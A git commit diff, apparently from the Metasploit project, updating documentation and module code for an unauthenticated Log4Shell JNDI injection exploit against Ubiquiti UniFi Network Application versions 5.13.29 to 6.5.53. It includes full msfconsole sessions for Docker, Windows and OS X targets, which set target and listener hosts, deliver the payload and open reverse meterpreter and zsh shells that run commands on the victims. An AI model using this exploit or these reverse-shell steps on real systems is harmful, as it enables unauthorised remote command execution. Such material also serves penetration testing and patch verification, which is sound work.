Update docs, note OS X support
This commit is contained in:
parent
ba469a4b2c
commit
579627f5c7
|
@ -1,7 +1,7 @@
|
|||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
The Ubiquiti Unifi Controller application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
|
||||
deserialize a malicious Java object. This results in OS command execution.
|
||||
|
||||
|
@ -10,7 +10,7 @@ This module will start an LDAP server that the target will need to connect to.
|
|||
### Setup
|
||||
|
||||
1. Either install the Windows application, or start the docker container (use jacobalberty/unifi:v6.5.53).
|
||||
2. Navigate to the service on HTTPS port 8443 to setup the Unifi controller.
|
||||
2. Navigate to the service on HTTPS port 8443 to setup the UniFi controller.
|
||||
3. On step 2, select the button to "Switch to Advanced Setup"
|
||||
4. While still on step 2, disable the remote access and "Use your Ubiquiti account for local access" options, then
|
||||
create a local account.
|
||||
|
@ -29,16 +29,16 @@ Older versions of the UniFi Network Application can be downloaded from [communit
|
|||
|
||||
## Scenarios
|
||||
|
||||
### Unifi Controller on Docker
|
||||
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.55, v6.0.45, and v5.14.23 all contain the fix for this
|
||||
### UniFi Network Application v6.6.53 on Docker
|
||||
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
|
||||
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
|
||||
|
||||
|
||||
```
|
||||
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
|
||||
[*] Using configured payload windows/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Linux
|
||||
TARGET => Linux
|
||||
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Unix
|
||||
TARGET => Unix
|
||||
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.250.6
|
||||
RHOST => 192.168.250.6
|
||||
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.250.134
|
||||
|
@ -64,7 +64,7 @@ pwd
|
|||
/usr/lib/unifi
|
||||
```
|
||||
|
||||
### Unifi Controler on Windows Server 2016
|
||||
### UniFi Network Application v6.5.53 on Windows Server 2016
|
||||
|
||||
```
|
||||
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
|
||||
|
@ -104,4 +104,53 @@ Meterpreter : x86/windows
|
|||
meterpreter >
|
||||
```
|
||||
|
||||
### UniFi Network Application v5.14.22 on OSX 11.2.3
|
||||
|
||||
```
|
||||
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show options
|
||||
|
||||
Module options (exploit/multi/http/ubiquiti_unifi_log4shell):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LDIF_FILE no Directory LDIF file path
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 111.111.1.11 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RPORT 8443 yes The target port (TCP)
|
||||
SRVHOST 222.222.2.222 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 389 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes Base path
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_zsh):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 222.222.2.222 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
2 Unix
|
||||
|
||||
|
||||
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > run
|
||||
|
||||
[*] Started reverse TCP handler on 222.222.2.222:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable.
|
||||
[+] Delivering the serialized Java object to execute the payload...
|
||||
[*] Client sent unexpected request 2
|
||||
[*] Command shell session 2 opened (222.222.2.222:4444 -> 111.111.1.11:50474 ) at 2022-01-20 07:20:22 -0500
|
||||
[*] Server stopped.
|
||||
|
||||
id
|
||||
uid=501(yourmom) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),399(com.apple.access_ssh),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)
|
||||
```
|
||||
|
||||
[1]: https://community.ui.com/releases?q=network+application
|
||||
|
|
|
@ -11,9 +11,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def initialize(_info = {})
|
||||
super(
|
||||
'Name' => 'Unifi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
|
||||
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
|
||||
'Description' => %q{
|
||||
The Ubiquiti Unifi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
|
||||
deserialize a malicious Java object. This results in OS command execution.
|
||||
|
||||
|
@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'SSL' => true,
|
||||
'WfsDelay' => 30
|
||||
},
|
||||
'DefaultTarget' => 1,
|
||||
'Targets' => [
|
||||
[
|
||||
'Windows', {
|
||||
|
@ -44,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
},
|
||||
],
|
||||
[
|
||||
'Linux', {
|
||||
'Unix', {
|
||||
'Platform' => 'unix',
|
||||
'Arch' => [ARCH_CMD],
|
||||
'DefaultOptions' => {
|
||||
|
@ -85,8 +86,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
server_version = Rex::Version.new(server_version)
|
||||
if server_version < Rex::Version.new('5.13.29')
|
||||
return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')
|
||||
elsif server_version > Rex::Version.new('6.5.54')
|
||||
return Exploit::CheckCode::Safe('Versions after 6.5.54 are patched and not affected.')
|
||||
elsif server_version > Rex::Version.new('6.5.53')
|
||||
return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')
|
||||
end
|
||||
|
||||
vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
|
||||
|
|
Loading…
Reference in New Issue